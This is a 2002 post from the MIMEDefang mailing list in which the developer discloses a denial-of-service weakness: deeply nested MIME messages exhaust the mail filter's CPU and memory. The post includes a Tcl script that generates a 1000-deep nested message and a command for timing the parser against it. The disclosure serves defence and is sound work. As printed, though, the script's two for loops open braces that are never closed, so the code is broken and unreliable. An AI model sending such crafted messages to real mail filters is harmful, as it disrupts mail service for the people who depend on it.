[Mimedefang] Deep recursion

David F. Skoll dfs at roaringpenguin.com
Tue Jun 11 16:37:56 EDT 2002


I figured out the problem.  It was a deeply-nested MIME message.  Be
aware that this could be a potential DoS attack against MIMEDefang.  I've
attached a Tcl script which generates a 1000-deep nested MIME message.
The message is relatively small (only 88kB), but doing this:

	tclsh degenerate.tcl | time mimedefang.pl -structure > /dev/null

reveals that mimedefang.pl uses 70 seconds of CPU time and over two
minutes of elapsed time on my P-II/400.  It also seems to chew through
memory; I heard a lot of disk thrashing.

As far as I know, MIME::Tools has no way to abort a parse because
it's recursing too deeply.  I'll consider adding that.

Also, please be aware that there are most likely many other ways
to confuse MIME::Tools with illegal or corner-case MIME messages. :-(



--- degenerate.tcl ---

set DEPTH 1000

puts "MIME-Version: 1.0"
puts "Content-Type: multipart/mixed; boundary=\"boundary.1\""

# Open up the parts
for {set i 1} {$i < $DEPTH} {incr i} {
    puts ""
    puts "--boundary.$i"
    set j [expr $i + 1]
    puts "Content-Type: multipart/mixed; boundary=\"boundary.$j\""

# Write the leaf
puts ""
puts "--boundary.$DEPTH"
puts "Content-Type: text/plain"
puts ""
puts "Foo!!"

# And close them
for {set i $DEPTH} {$i > 0} {incr i -1} {
    puts ""
    puts "--boundary.$i--"

More information about the MIMEDefang mailing list